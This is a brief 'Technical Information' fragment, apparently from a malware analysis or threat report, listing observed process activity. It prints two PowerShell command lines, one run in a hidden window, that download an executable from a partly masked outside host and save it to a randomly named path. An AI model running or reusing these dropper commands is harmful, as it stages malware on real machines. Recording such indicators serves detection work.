Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $u='http://gr##s.com/kpxa.exe';$o='C:\xSXfVBK\KINkryd\ppFJMEc.exe';Invoke-WebRequest -Uri $u -OutFile $o
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $u='http://gr##s.com/kpxa.exe';$o='C:\xSXfVBK\KINkryd\ppFJMEc.exe';Invoke-WebRequest -Uri $u -OutFile $o' (with hidden window)